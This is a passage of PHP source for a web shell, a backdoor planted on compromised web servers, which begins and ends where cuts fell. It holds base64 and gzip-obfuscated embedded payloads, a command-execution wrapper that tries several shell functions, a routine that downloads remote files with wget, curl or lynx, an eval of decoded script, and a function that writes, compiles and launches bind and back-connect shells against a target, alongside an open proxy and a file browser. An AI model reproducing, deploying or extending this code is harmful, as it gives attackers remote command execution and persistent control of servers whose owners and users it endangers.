p6m1bD9LqXyyPvlYVRgrcEaGkyD51jYnJDHgQPHpkTK/nabeQaav0rXIXgBFu0P+1V6rIrnj8Up8DAop+uyozIk//vRRbh+q6u1IixgemQd8oqRm/YX5pZTuYAQTHjtW6orubfN4b4V0t6a8igxIdnptekmPiwCzGnAzX8WysAhhd5O/7vXc1E8nBsSbiLWuvlSsNzK8rcEbK9WcE/3bKbQFEyxNYXHklun7Q5B4Qsr6fV31kNstfEaTtZOueHrcJiI3kzuL5T2fBHNu8u5Xccplm1O1MRaevD3sf+H1p2DgljquYCRH0L69bnMOtYPYD9HwflmOv1MOcwX5Pggi/kN7fADBfd/XiyjKbc0C6DIWlI3HqNJcY5EoM3VcmgHjWi1DVwPm9hoF+jqJDLOt6IGYe3ND9Ol0xBbm5Rm8hM7dkb45cm4Z4QSD1K3DVnehp8PydKinsUKFcghv990FvWlo/q8E2jMHGhHL4XgMwxtOgYljd3yrS7Au/0IuCd11L35VLvkvQvtFXQJOueG3IqPe3nFLHOUSW+bF8hrHyEWY1syWxmesH0hnwPZJKs7ka74sPoysIbmJNo6p5ltN6m8zmDFt7fFV7ZEj1u1GNhUUMAgWXjQy9dCFZhP6wENm8X2vMWFCNg92qDu0g/AIw9+PGhWsqpzIfl/bcE/BNjXIBSsR7Ali7vcfA7aPYI8fDbZfgO3vBOt3u/qZNR4a5HhzvDZ3tK9AjEjwwxRo3jrbbr789hvdCL5KeSjCZs8p7fjZrKfcBuGuNA2+E/7vIzmIoLvKoeDzu2jOZZp5q1xkz+cgyF7oJ9FsppatPodhI47Ngv5Gtvk5bhAThg9oUCyDA6XDwgeXhPdvJJ5IKteHiLTd0Z894pi+96QJioMePQljkemmgQ0PaSlrOKCna0/TjCuiRg176V6++dbXUz36XNAzsu0C9HS9F7ZNtkuyCns7Bxn1ZUURePv781UUdlj5He9YXKgeDlKcELNRLnAOOuXyO34lfdA7WYvFsTLRBHGadGbQ5PoctJPHiHdMNGmmSZN1yY7TkgzIuYWYEpmNf0taNgHy6ZFRo1aCJSATkTzAtWk3oBs6MaDuw54UAQ5LEQQ7JrcGgRsCFafB4afO2mrLqz6ybr5qNWPWB2fFjpXaxGszmKomdCIp0hKRoNfu9FftWfReMbfVjVK6hjW+1PsYCWg0rAx09CXkd7Q5cVRt047C39mMUBKjF0e/PBMpzgknSlgpWolpf99ZYxE4uq+3HzdKZMYU47EuZs45z1jEFLnStYJDMirZ2dqpMLJaxjKj3y/VCQjlasrKjDG+l8t0+YcsXXLIxupjoeWoTBUtgVC7AAHVS0cppSytv5XULNgVUoNlU0rAk0DEZytf/ZWGiiRVY/ae06Wh/rRALKURVyDdC/aYH6fBLbYvCR761YVVzRm3fBtpznvETH/i0dYCeoqSanmkX8zFI6L8SqsHe6UyxZirw5b670Qgd4O7FfcYoIq0uPlT9x7qc4tRMQFa+grdtDcgza34lUBi6aESM9JxtvsbmUXJvA55TjO1yEue0IRevoyhADeb7t+MBDeQx+gefCvIggTaDpJk/iAE0KF1nmZUtJxjSJWu8jS+wwD7liaoRdD3Ci4DoMglRiRY3ThX724jwAyXryYVu7XhNjFlsnYFfOmD28btl0aIjldGalaQKT/u4HUOF81ktfBFVhXx3Fyv20GLdYvBTfX8Nw==",
	'proxy' => "lVVda9swFH12of9Bg4EcFszYupeFUDrIyKBlJQmjUEpQretErSN5kpzElPz3Xcly6mZOaSEEcc89535KXjNNtqucDMmKPcLN1WXcG5yeZKVMrVCyMZK4R55OTyKRkdhWBaiMoHVsbTGBvyUYS4ZDQkvJIRMSOK29I3X/AKk1KH6hNatiZ4volUi1MiqzidOYza5pPwBTNHx53Zp8TT4fQc6OIt8QcYArLYoypUksiJAk5BeyjayuwinSYEstiYQNucBOrOHmt/eNA+VW3NVi0Y6kzKZLEgPK7JzJ/e0I5AZqtZbWy6b5Vjt3/LV6btVikcMc01w1fV+AjWmh1baa1yjtJUJK0OMZDmdIWrijIWpslUPChSlyVvnpSCWBknNCx4Lj4Tuh06Xa0MFL+W76+wLc5yp99BG8aeAL3JeHUth+XhcWesNVWq5A2gTBUQ7u+KP6xZ3bATtXjM+XTPIcdNMd3N9EFSBjinTaJ/Tp43w6mvwZTW7p9fgaz5c/6d3uvJ3/oOFJDYxXxjILKeouAKvdRwsB/N47b+87db6u4rNmcfbp3ytetQbzaUhqlimUNDCDra2XxrcTF2Je6hx7uWZ56eLWCQZ7yzPY1fyBrZlJtSgsstIlpI/An3lt3M0hOPhJ0C45sWILMN1SNfYmGSus38gOFQ+9SWQFlnVrOKRbYldfHz9IA5LHsszzsDGtp2ojJFebhHE+WuOULoWxgCMiHzrerCO+MXWLh7vV3r8+yRjech+wvu+toPudeFPYo97vD9xUYC1Ll17r1UKf3WKqZEewVpSDT0CQqFn+CWguTvMBWOPXBbZYipALHGnt6Ud3wP3/ykUNLw4PbTunYDt8aQ9F25Tnp/Yf"
);

if(isset($_REQUEST['icon'])){
	if(isset($icons[$_REQUEST['icon']])) {
		$icon = $icons[$_REQUEST['icon']];
		$data = gzinflate(base64_decode($icon));
		header("Content-type: image/png");
		header("Cache-control: public");
		echo $data;
		exit;
	}
}

if(isset($_REQUEST['phpinfo'])){
	phpinfo();
	exit;
}

if(isset($_REQUEST['css'])){
	ob_start ("ob_gzhandler");
	$data = gzinflate(base64_decode($style));
	header("Content-type: text/css; charset: UTF-8");
	header("Cache-control: public");
	echo $data;
	exit;
}

if(isset($_REQUEST['js'])){
	if(isset($jscripts[$_REQUEST['js']])) {
		ob_start ("ob_gzhandler");
		$jscript = $jscripts[$_REQUEST['js']];
		$data = gzinflate(base64_decode($jscript));
		header("Content-type: text/javascript");
		header("Cache-control: public");
		eval("\$data = \"".$data."\";");
		echo $data;
		exit;
	}
}

class proxied {
		
	var $url;
	var $url_first;
	var $ch;
	var $info;
	var $header;
	var $data;
	var $to_unlink;
	var $cookie_file;
	var $istext;
	var $success;
	
	function proxied ($url) {
		$this->url = $url;
		$this->handle_actions();
		$this->ch = curl_init($url);
		$this->set_options();
		$this->istext = TRUE;
		$this->data = curl_exec($this->ch);
		if($this->istext) $this->parse_data($this->data);
		if ($error = curl_error($ch)) {
		    echo "Error: $error<br />\n";
		}
		curl_close($this->ch);
		$_SESSION['proxy_cookie'] = file_get_contents($this->cookie_file);
		if ($this->to_unlink) {
			foreach ($this->to_unlink as $file) {
				@unlink($file);
			}
		}
	}
	
	function set_options () {
		$tmp_dir = sys_get_temp_dir();
		if (!array_key_exists('proxy_no_javascript', $_SESSION)) {
			$_SESSION['proxy_no_javascript'] = 'yes';
			$_SESSION['proxy_no_images'] = 'no';
			$_SESSION['proxy_no_title'] = 'no';
			$_SESSION['proxy_no_meta'] = 'no';
		}
		$this->cookie_file = tempnam($tmp_dir,'ws');
		if(isset($_SESSION['proxy_cookie'])) file_put_contents($this->cookie_file,$_SESSION['proxy_cookie']);
		$this->to_unlink[]=$this->cookie_file;
		$options = array(
			CURLOPT_RETURNTRANSFER => true,
			CURLOPT_FOLLOWLOCATION => true,
			CURLOPT_AUTOREFERER => true,
			CURLOPT_SSL_VERIFYPEER => false,
			CURLOPT_SSL_VERIFYHOST => false,
			//CURLOPT_HEADERFUNCTION => array(&$this, 'read_header'),
			//CURLOPT_WRITEFUNCTION => array(&$this, 'read_body'),
			CURLOPT_COOKIEFILE => $this->cookie_file,
			CURLOPT_COOKIEJAR => $this->cookie_file
		);
		if (count($_POST)) {
			$post = array();
			foreach ($_POST as $key => $value) {
				$post[$key] = $value;
			}
		}
		if (count($_FILES)) {
			$post = $post ? $post : array();
			foreach ($_FILES as $name => $file) {
				$this->to_unlink[] = "{$tmp_dir}uploads_{$file['name']}";
				move_uploaded_file($file['tmproxy_name'], "{$tmp_dir}uploads_{$file['name']}");
				$post[$name] = "@{$tmp_dir}uploads_{$file['name']}";
			}
		}
		if ($post) {
			$options[CURLOPT_POST] = true;
			$options[CURLOPT_POSTFIELDS] = $post;
		}
		if (preg_match('#proxy_new_url=([^&]+)#', $_SERVER['HTTP_REFERER'], $referer)) {
			$referer = base64_decode($referer[1]);
			$options[CURLOPT_REFERER] = $referer;
		}
		$options[CURLOPT_USERAGENT] =  $_SERVER['HTTP_USER_AGENT'];
		foreach ($options as $option => $value) {
			@curl_setopt($this->ch, $option, $value);
		}
	}
	
	function read_header($ch, $string)
	{
	    $length = strlen($string);
	    if(preg_match("#text#i",$string)) $this->istext = TRUE;
	    if(!preg_match("#(Set-Cookie): .*#i",$string)) header($string);
	    return $length;
	}
	
	function read_body($ch, $string)
	{	
		$length = strlen($string);
	    if($this->istext){
			$this->data .= $string;
	    }else{
			echo $string;
			ob_flush();
			flush();
		}
	    return $length;
	}
	
	function parse_data ($string) {
		$s = array();
		$r = array();
		if ($_SESSION['proxy_no_javascript'] == 'yes') {
			$s[] = '#<\s*script[^>]*?>.*?<\s*/\s*script\s*>#si';
			$r[] = '';
			$s[] = '#(\bon[a-z]+)\s*=\s*(?:"([^"]*)"?|\'([^\']*)\'?|([^\'"\s>]*))?#si';
			$r[] = '';
			$s[] = '#<noscript>(.*?)</noscript>#si';
			$r[] = '\\1';
		}
		if ($_SESSION['proxy_no_images'] == 'yes') {
			$s[] = '#<(img|image)[^>]*?>#si';
			$r[] = '';
		}
		if ($_SESSION['proxy_no_title'] == 'yes') {
			$s[] = '#<\s*title[^>]*?>.*?<\s*/\s*title\s*>#si';
			$r[] = '';
		}
		if ($_SESSION['proxy_no_meta'] == 'yes') {
			$s[] = '#<(meta)[^>]*?>#si';
			$r[] = '';
		}
		$this->data = preg_replace($s, $r, $string);
		$this->info = curl_getinfo($this->ch);
		$this->url = parse_url($this->info['url']);
		$this->url['full'] = $this->info['url'];
		$this->url_first = $this->info['url'];
		if (preg_match('#css#i', $this->info['content_type'])) {
			$this->data = $this->parse_css($this->data);
		} elseif (preg_match('#html|xml#i', $this->info['content_type'])) {
			$this->data = $this->parse_html($this->data);
		}
		header("Content-Lenght:");
		header("Content-Type: ".$this->info['content_type']);
		echo $this->data;
	}
	
	function parse_html ($string) {
		$parse = array(
			'a' => array('href'),
			'img' => array('src', 'longdesc'),
			'image' => array('src', 'longdesc'),
			'body' => array('background'),
			'frame' => array('src', 'longdesc'),
			'iframe' => array('src', 'longdesc'),
			'head' => array('profile'),
			'layer' => array('src'),
			'input' => array('src', 'usemap'),
			'form' => array('action'),
			'area' => array('href'),
			'link' => array('href', 'src', 'urn'),
			'meta' => array('content'),
			'param' => array('value'),
			'applet' => array('codebase', 'code', 'object', 'archive'),
			'object' => array('usermap', 'codebase', 'classid', 'archive', 'data'),
			'script' => array('src'),
			'select' => array('src'),
			'hr' => array('src'),
			'table' => array('background'),
			'tr' => array('background'),
			'th' => array('background'),
			'td' => array('background'),
			'bgsound' => array('src'),
			'blockquote' => array('cite'),
			'del' => array('cite'),
			'embed' =>  array('src'),
			'fig' => array('src', 'imagemap'),
			'ilayer' => array('src'),
			'ins' => array('cite'),
			'note' => array('src'),
			'overlay' => array('src', 'imagemap'),
			'q' => array('cite'),
			'ul' => array('src')
		);
		$tags = $this->get_tags($string);
		$to_replace = array();
		foreach ($tags as $tag) {
			$tag_name = $this->get_tag_name($tag);
			$attributes = $this->get_attributes($tag);
			if ($tag_name == 'base' && $attributes['href']) {
				$this->url = parse_url($attributes['href']);
				$this->url['full'] = $attributes['href'];
				$to_replace[] = array(
					'string' => $tag,
					'value' => ''
				);
			}
			if ($attributes['style']) {
				$attributes['style'] = $this->parse_css($attributes['style']);
			}
			if ($parse[$tag_name]) {
				$extra_html = '';
				$relink = true;
				$new_tag = "<$tag_name";
				switch ($tag_name) {
					case 'form':
						if (strtolower($attributes['method']) == 'get' || !$attributes['method']) {
							$url = $attributes['action'] ? $this->encode_url($attributes['action'], false, true) : $this->encode_url($this->url['full'], false, true);
							$extra_html = "<input type=\"hidden\" name=\"proxy_new_url\" value=\"$url\" /><input type=\"hidden\" name=\"proxy_action\" value=\"redirect_get\" />";
							$attributes['action'] = ''.$_SERVER['PHP_SELF'].'';
							$attributes['method'] = 'post';
							$relink = false;
						}
					break;
					case 'head':
						if ($_GET['proxy_form'] != '0') {
							$extra_html = "<script language=\"javascript\" type=\"text/javascript\">\n";
							$extra_html .= "var proxy_new_url = '{$this->url_first}';\n";
							$no_javascript = $_SESSION['proxy_no_javascript'] == 'yes' ? 'true' : 'false';
							$extra_html .= "var proxy_no_javascript = $no_javascript;\n";
							$no_images = $_SESSION['proxy_no_images'] == 'yes' ? 'true' : 'false';
							$extra_html .= "var proxy_no_images = $no_images;\n";
							$no_title = $_SESSION['proxy_no_title'] == 'yes' ? 'true' : 'false';
							$extra_html .= "var proxy_no_title = $no_title;\n";
							$no_meta = $_SESSION['proxy_no_meta'] == 'yes' ? 'true' : 'false';
							$extra_html .= "var proxy_no_meta = $no_meta;\n";
							$extra_html .= "</script>\n";
							$extra_html .= '<script language="javascript" type="text/javascript" src="'.$_SERVER['PHP_SELF'].'?js=proxy"></script>';
						}
					break;
				}
				if ($attributes) {
					foreach ($attributes as $attribute_name => $attribute_value) {
						if (in_array($attribute_name, $parse[$tag_name])) {
							switch ($tag_name) {
								default:
									if ($relink) {
										if ($attribute_name == 'src') {
											$extra = '&proxy_form=0';
										} else {
											$extra = '';
										}
										$attribute_value = $this->encode_url($attribute_value) . $extra;
									}
								break;
								case 'meta':
									if (preg_match('#refresh#i', $attributes['http-equiv']) && $tag_name == 'meta' && $attribute_name == 'content' && preg_match('#^(\s*[0-9]*\s*;\s*url=)(.*)#i', $attribute_value, $content)) {
										$attribute_value =  $content[1] . $this->encode_url($content[2]);
									}
								break;
							}
						}
						$new_tag .= " $attribute_name=\"$attribute_value\"";
					}
				}
				$new_tag .= ">$extra_html";
				$to_replace[] = array(
					'string' => $tag,
					'value' => $new_tag
				);
			}
		}
		$string = $this->mass_replace($to_replace, $string);
		return $string;
	}
	
	function parse_css ($string) {
		$to_replace = array();
		preg_match_all('#url[\s]*\([\s]*("[^"]+"|\'[^\']+\'|[^\s>]+)[\s]*\)#si', $string, $urls);
		for ($i = 0; $i < count($urls[0]); $i++) {
			$url = $this->encode_url(preg_replace('#^("([^"]+)"|\'([^\']+)\')$#', '\\2\\3', $urls[1][$i]));
			$to_replace[] = array(
				'string' => $urls[0][$i],
				'value' => "url('$url')"
			);
		}
		preg_match_all('#@import[\s]*("[^"]+"|\'[^\']+\'|[^\s>]+)#si', $string, $urls);
		for ($i = 0; $i < count($urls[0]); $i++) {
			$url = $this->encode_url(preg_replace('#^("([^"]+)"|\'([^\']+)\')$#', '\\2\\3', $urls[1][$i]));
			$to_replace[] = array(
				'string' => $urls[0][$i],
				'value' => "@import '$url'"
			);
		}
		$string = $this->mass_replace($to_replace, $string);
		return $string;
	}
	
	function get_tags ($string) {
		preg_match_all('#<([a-z-]+)([^>]+)>#si', $string, $tags);
		return $tags[0];
	}
	
	function get_tag_name ($string) {
		preg_match('#^<([a-z0-9-]+)#i', $string, $matches);
		return strtolower($matches[1]);
	}
	
	function get_attributes ($string) {
		$attributes = array();
		$string = preg_replace('#^<[a-z-]+|>$#i', '', $string);
		if ($string) {
			preg_match_all('#([a-z-]+)=?("[^">]*"|\'[^\'>]*\'|[^\s>]*)#si', $string, $matches);
			for ($i = 0; $i < count($matches[0]); $i++) {
				$attributes[strtolower($matches[1][$i])] = $this->striproxy_quotes($matches[2][$i]);
			}
			return $attributes;
		} else {
			return false;
		}
	}
	
	function striproxy_quotes ($string) {
		return preg_replace('#^("([^"]*)"|^\'([^\']*)\')$#', '\\2\\3', $string);
	}
	
	function mass_replace ($array, $string) {
		foreach ($array as $replacement) {
			$string = str_replace($replacement['string'], $replacement['value'], $string);
		}
		return $string;
	}
	
	function encode_url ($string, $raw = false, $plain = false) {
		$string = $this->striproxy_quotes(html_entity_decode($string));
		if(preg_match("#^//(.*)$#i",$string)){
			$string = preg_replace("#^//(.*)$#i","http://\\1",$string);
		}
		if (preg_match('#^[a-z]{2,}:#i', $string)) {
			
		} elseif (preg_match('#^/#', $string)) {
			$string = "{$this->url[scheme]}://{$this->url[host]}$string";
		} elseif (preg_match('#^\##', $string)) {
			$raw = true;
		} elseif (preg_match('#^mailto:#', $string)) {
			$raw = true;
		} elseif (preg_match('#^\.\./#', $string)) {
			preg_match_all('#\.\./#', $string, $matches);
			$path = preg_replace('#/([^/]*)$#', '/', $this->url['path']);
			for ($i = 0; $i < count($matches[0]); $i++) {
				$path = preg_replace('#([^/]*)/$#', '', $path);
			}
			$path = preg_replace('#/$#', '', $path) . '/';
			$string = preg_replace('#\.\./#', '', $string);
			$string = "{$this->url[scheme]}://{$this->url[host]}$path$string";
		} else {
			$string = preg_replace('#^\./#', '', $string);
			$path = preg_replace('#/([^/]*)$#', '/', $this->url['path']);
			$path = preg_replace('#/$#', '', $path) . '/';
			$string = "{$this->url[scheme]}://{$this->url[host]}$path$string";
		}
		return $raw ? $string : (!$plain ? ''.$_SERVER['PHP_SELF'].'?proxy_new_url=' : '') . base64_encode($string);
	}
	
	function handle_actions () {
		if ($_POST['proxy_action'] == 'redirect_get') {
			$url = base64_decode($_POST['proxy_new_url']);
			unset($_POST['proxy_action'], $_POST['proxy_new_url']);
			$get = '';
			foreach ($_POST as $key => $value) {
				$value = urlencode($value);
				$get .= "&$key=$value";
			}
			$get = preg_match('#\?#', $url) ? $get : preg_replace('#^&#', '?', $get);
			$url = base64_encode($url . $get);
			header("Location: ".$_SERVER['PHP_SELF']."?proxy_new_url=$url");
			exit;
		} elseif ($_POST['proxy_action'] == 'redirect_browse') {
			$_SESSION['proxy_no_javascript'] = (bool) $_POST['proxy_no_javascript'] ? 'yes' : 'no';
			$_SESSION['proxy_no_images'] = (bool) $_POST['proxy_no_images'] ? 'yes' : 'no';
			$_SESSION['proxy_no_title'] = (bool) $_POST['proxy_no_title'] ? 'yes' : 'no';
			$_SESSION['proxy_no_meta'] = (bool) $_POST['proxy_no_meta'] ? 'yes' : 'no';
			header('Location: '.$_SERVER['PHP_SELF'].'?proxy_new_url=' . base64_encode($_POST['proxy_new_url']));
			exit;
		}
	}
	
}

$url = @parse_url($_GET['proxy_new_url']) && strlen($_GET['proxy_new_url']) ? base64_decode($_GET['proxy_new_url']) : false;
if ($url || $_POST['proxy_action']) {
	if(function_exists('curl_exec')){
		if(preg_match("#^//(.*)$#i",$url)){
			$url = preg_replace("#^//(.*)$#i","http://\\1",$url);
		}
		$proxied = new proxied($url);
		//if(!$proxied->success)	echo "$url not found!!";
	}else{
		echo "Curl not installed!!";
	}
	exit;
}

if(isset($_REQUEST['proxy_form'])){
	?>
		<style type="text/css">
			
			#proxy_container {
				font-size: 11px;
				font-family: Tahoma, Verdana, Arial;
				position: fixed;
				z-index:999999;
				top: 0px;
				left: 25px;
				color: black;
				border-radius: 0px;
			}
			
			#proxy_container input{
				margin:2px;
				min-width:500px;
				max-width:100%;
				border: 1px solid black;
				padding:2px;
				background:white;
				outline:0;
				border-radius: 0px;
				color: black;
				text-shadow:none;
			}
			
			#proxy_container input[type=checkbox]{
				min-width:0;
			}
			
			
			#proxy_container input[type=submit] {
				background:lightgrey;
				min-width:70px;
				font-weight:bold;
				cursor: pointer;
			}
			
			#proxy_container input[type=submit]:hover{
				background:black;
				color:white;
			}
			
			#proxy_container label {
				margin:5px;
				vertical-align:top;
				width:75px;
				cursor: pointer;
			}
			
			#proxy_options {
				text-align: left;
			}
						
			#proxy_form {
				border:1px solid #000;
				border-top:0px;
				background-color: #FFF;
				margin: 0px;
				padding: 10px;
			}
						
			#proxy_toggle {
				font-weight: bold;
				text-decoration: none;
				display: block;
				float: left;
				border:1px solid black;
				border-top:0px;
				padding:3px;
				margin-top:-1px;
				background:white;
				color:black;
			}
			
		</style>
		<div id="proxy_container">
			<form method="post" action="<?php echo $_SERVER['PHP_SELF'];?>" id="proxy_form" style="display: none;">
				<input type="hidden" name="proxy_action" value="redirect_browse" />
				<input type="text" name="proxy_new_url" id="new_url" />
				<input type="submit" value="Browse" id="proxy_button" />
				<div id="proxy_options" >
					<label for="proxy_no_javascript">
						<input type="checkbox" name="proxy_no_javascript" id="proxy_no_javascript" />
						Disable JavaScript
					</label>
					<label for="proxy_no_images">
						<input type="checkbox" name="proxy_no_images" id="proxy_no_images" />
						Disable Images
					</label>
					<label for="proxy_no_title">
						<input type="checkbox" name="proxy_no_title" id="proxy_no_title" />
						Block Title
					</label>
					<label for="proxy_no_meta">
						<input type="checkbox" name="proxy_no_meta" id="proxy_no_meta" />
						Block Meta
					</label>
				</div>
			</form>
			<a href="#" id="proxy_toggle" onclick="toggle_form(); return false;">Show</a>
		</div>
	<?php
	exit;
}

if(isset($_REQUEST['dh'])){
	unset($_SESSION['dir']);
}

function swd($p){
	$ps = explode(DIRECTORY_SEPARATOR,$p);
	$pu = "";
	for($i = 0 ; $i < sizeof($ps)-1 ; $i++){
		$pz = "";
		for($j = 0 ; $j <= $i ; $j++) $pz .= $ps[$j].DIRECTORY_SEPARATOR;
		$pu .= "<a href=\"?d=".$pz."\">".$ps[$i]." ".DIRECTORY_SEPARATOR." </a>";
	}
	return trim($pu);
}
function rp($t){
	return trim(str_replace("<br />","",$t));
}
function cs($t){
	return str_replace(" ","_",$t);
}
function ss($t){
	if (!get_magic_quotes_gpc()) return trim(urldecode($t));
	return trim(urldecode(stripslashes($t)));
}
function ssc($t){
	if (!get_magic_quotes_gpc()) return $t;
	return stripslashes($t);
}
function rs($s_win, $d, $type, $sc, $target){
	$result = "";

	$fc = gzinflate(base64_decode($sc));

	$errperm = "<p class=\"rs_result\">error: permission denied. check current working directory permissions</p>";
	$errgcc = "<p class=\"rs_result\">error: can not compile using gcc</p>";

	if($type == "xbind_pl"){
		$fname = $CONFIG['SCRIPT']."_bind.pl";
		$fpath = $d.$fname;
		if(is_file($fpath)) unlink($fpath);
		if($file=fopen($fpath,"w")){
			fwrite($file,$fc);
			fclose($file);
			if(is_file($fpath)){
				$res = exe("chmod +x ".$fpath);
				$res = exe("perl ".$fpath." ".$target);
			}
			else $result = $errperm;
		}
		else $result = $errperm;
	}
	elseif($type == "xbind_py"){
		$fname = $CONFIG['SCRIPT']."_bind.py";
		$fpath = $d.$fname;
		if(is_file($fpath)) unlink($fpath);
		if($file=fopen($fpath,"w")){
			fwrite($file,$fc);
			fclose($file);
			if(is_file($fpath)){
				$res = exe("chmod +x ".$fpath);
				$res = exe("python ".$fpath." ".$target);
			}
			else $result = $errperm;
		}
		else $result = $errperm;

	}
	elseif($type == "xbind_bin"){
		$fname = $CONFIG['SCRIPT']."_bind";
		$fpath = $d.$fname;

		if(!$s_win){
			if(is_file($fpath)) unlink($fpath);
			if(is_file($fpath.".c")) unlink($fpath.".c");
			if($file=fopen($fpath.".c","w")){
				fwrite($file,$fc);
				fclose($file);
				if(is_file($fpath.".c")){
					$res = exe("gcc ".$fpath.".c -o ".$fpath);
					if(is_file($fpath)){
						$res = exe("chmod +x ".$fpath);
						$res = exe($fpath." ".$target);
					}
					else $result = $errgcc;
				}
				else $result = $errperm;

			}
			else $result = $errperm;
		}
		else{
			$fpath = $fpath . ".exe";
			if(is_file($fpath)) unlink($fpath);
			if($file=fopen($fpath,"w")){
				fwrite($file,$fc);
				fclose($file);
				if(is_file($fpath)){
					$res = exe("\"".$fpath."\" ".$target);
				}
				else $result = $errperm;
			}
			else $result = $errperm;
		}

	}
	elseif($type == "xback_pl"){
		$fname = $CONFIG['SCRIPT']."_back.pl";
		$fpath = $d.$fname;
		$tar = explode(" ",$target,2);
		if(is_file($fpath)) unlink($fpath);
		if($file=fopen($fpath,"w")){
			fwrite($file,$fc);
			fclose($file);
			if(is_file($fpath)){
				$res = exe("chmod +x ".$fpath);
				$res = exe("perl ".$fpath." ".$target);
			}
			else $result = $errperm;
		}
		else $result = $errperm;
	}
	elseif($type == "xback_py"){
		$fname = $CONFIG['SCRIPT']."_back.py";
		$fpath = $d.$fname;
		$tar = explode(" ",$target,2);
		if(is_file($fpath)) unlink($fpath);
		if($file=fopen($fpath,"w")){
			fwrite($file,$fc);
			fclose($file);
			if(is_file($fpath)){
				$res = exe("chmod +x ".$fpath);
				$res = exe("python ".$fpath." ".$target);
			}
			else $result = $errperm;
		}
		else $result = $errperm;

	}
	elseif($type == "xback_bin"){
		$fname = $CONFIG['SCRIPT']."_back";
		$fpath = $d.$fname;
		$tar = explode(" ",$target,2);

		if(!$s_win){
			if(is_file($fpath)) unlink($fpath);
			if(is_file($fpath.".c")) unlink($fpath.".c");
			if($file=fopen($fpath.".c","w")){
				fwrite($file,$fc);
				fclose($file);
				if(is_file($fpath.".c")){
					$res = exe("gcc ".$fpath.".c -o ".$fpath);
					if(is_file($fpath)){
						$res = exe("chmod +x ".$fpath);
						$res = exe($fpath." ".$target);
					}
					else $result = $errgcc;
				}
				else $result = $errperm;
			}
			else $result = $errperm;
		}
		else{
			$fpath = $fpath . ".exe";
			if(is_file($fpath)) unlink($fpath);
			if($file=fopen($fpath,"w")){
				fwrite($file,$fc);
				fclose($file);
				if(is_file($fpath)){
					$res = exe($fpath." ".$target);
				}
				else $result = $errperm;
			}
			else $result = $errperm;
		}
	}

	return $result;
}
function gs($f){
	if($s = filesize($f)){
		if($s <= 1024) return $s;
		else{
			if($s <= 1024*1024) {
				$s = round($s / 1024,2);
				return $s." kb";
			}
			else {
				$s = round($s / 1024 / 1024,2);
				return $s." mb";
			}
		}
	}
	else return "???";
}
function gp($f){
	if($m=fileperms($f)){
		$p='';
		$p .= ($m & 00400) ? 'r' : '-';
		$p .= ($m & 00200) ? 'w' : '-';
		$p .= ($m & 00100) ? 'x' : '-';
		$p .= ($m & 00040) ? 'r' : '-';
		$p .= ($m & 00020) ? 'w' : '-';
		$p .= ($m & 00010) ? 'x' : '-';
		$p .= ($m & 00004) ? 'r' : '-';
		$p .= ($m & 00002) ? 'w' : '-';
		$p .= ($m & 00001) ? 'x' : '-';
		return $p;
	}
	else return "??????????";
}
function exe($c){
	if(function_exists('system')) {
		ob_start();
		system($c);
		$b = ob_get_contents();
		ob_end_clean();
		return $b;
	}
	elseif(function_exists('shell_exec')){
		$b = shell_exec($c);
		return $b;
	}
	elseif(function_exists('exec')) {
		exec($c,$r);
		$b = "";
		foreach($r as $s){
			$b .= $s;
		}
		return $b;
	}
	elseif(function_exists('passthru')) {
		ob_start();
		passthru($c);
		$b = ob_get_contents();
		ob_end_clean();
		return $b;
	}
	return "";
}
function cp($p){
	if(is_dir($p)){
		$x = DIRECTORY_SEPARATOR;
		while(substr($p,-1) == $x) $p = rtrim($p,$x);
		return $p.$x;
	}
	return $p;
}
function rmdirs($d) {
	$f = glob($d . '*', GLOB_MARK);
	foreach($f as $z){
		if(is_dir($z)) rmdirs($z);
		else unlink($z);
	}
	if(is_dir($d)) rmdir($d);
}
function xwhich($pr){
	$p = exe("which $pr");
	if(trim($p)!="") { return trim($p); } else { return trim($pr); }
}
function dlfile($u,$p){
	$n = basename($u);

	if($t = file_get_contents($u)){
		if(is_file($p)) unlink($p);
		if($f=fopen($p,"w")){
			fwrite($f,$t);
			fclose($f);
			if(is_file($p)) return true;
		}
	}

	exe(xwhich('wget')." ".$u." -O ".$p);
	if(is_file($p)) return true;

	exe(xwhich('lwp-download')." ".$u." ".$p);
	if(is_file($p)) return true;

	exe(xwhich('lynx')." -source ".$u." > ".$p);
	if(is_file($p)) return true;

	exe(xwhich('curl')." ".$u." -o ".$p);
	if(is_file($p)) return true;

	return false;
}
function showdir($pwd,$prompt,$win){
	if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE;
	else $posix = FALSE;

	$user = "????:????";
	$fname = array();
	$dname = array();

	if($dh = scandir($pwd)){
		foreach($dh as $file){
			if(is_dir($file)) $dname[] = $file;
			elseif(is_file($file)) $fname[] = $file;
		}
	}
	else{
		if($dh = opendir($pwd)){
			while($file = readdir($dh)){
				if(is_dir($file)) $dname[] = $file;
				elseif(is_file($file))$fname[] = $file;
			}
			closedir($dh);
		}
	}

	sort($fname);
	sort($dname);

	$path = explode(DIRECTORY_SEPARATOR,$pwd);
	$tree = sizeof($path);
	$parent = "";
	$buff = "<table class=\"explore sortable\">
	<tr><th>name</th><th style=\"width:60px;\">size</th><th style=\"width:100px;\">owner : group</th><th style=\"width:70px;\">perms</th><th style=\"width:120px;\">modified</th><th style=\"width:230px;\">actions</th></tr>
	";
	if($tree > 2) for($i=0;$i<$tree-2;$i++) $parent .= $path[$i].DIRECTORY_SEPARATOR;
	else $parent = $pwd;

	foreach($dname as $folder){
		
		if(!$win && $posix){
			$name = posix_getpwuid(fileowner($folder));
			$group = posix_getgrgid(filegroup($folder));
			$owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
		} else {
			$owner = $user;
		}
		
		if($folder == ".") {
			$buff .= "<tr><td><a href=\"?d=".$pwd."\">[ $folder ]</a></td><td>LINK</td><td style=\"text-align:center;\">".$owner."</td><td style=\"text-align:center;\">".gp($pwd)."</td><td style=\"text-align:center;\">".date("d-M-Y H:i",filemtime($pwd))."</td><td><span id=\"titik1\"><a href=\"?d=$pwd&amp;new=".$pwd."\">newfile</a> | <a href=\"javascript:swap('titik1','titik1_form');\">newfolder</a> | <a href=\"?upload&amp;d=$pwd\">upload</a></span>
			<form action=\"" . $_SERVER['PHP_SELF'] . "\" method=\"get\" id=\"titik1_form\" class=\"hide\" style=\"margin:0;padding:0;\">
						<input class=\"inputz\" id=\"titik1_\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
			<input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" />
			</form></td></tr>
			";
		}
		elseif($folder == "..") {
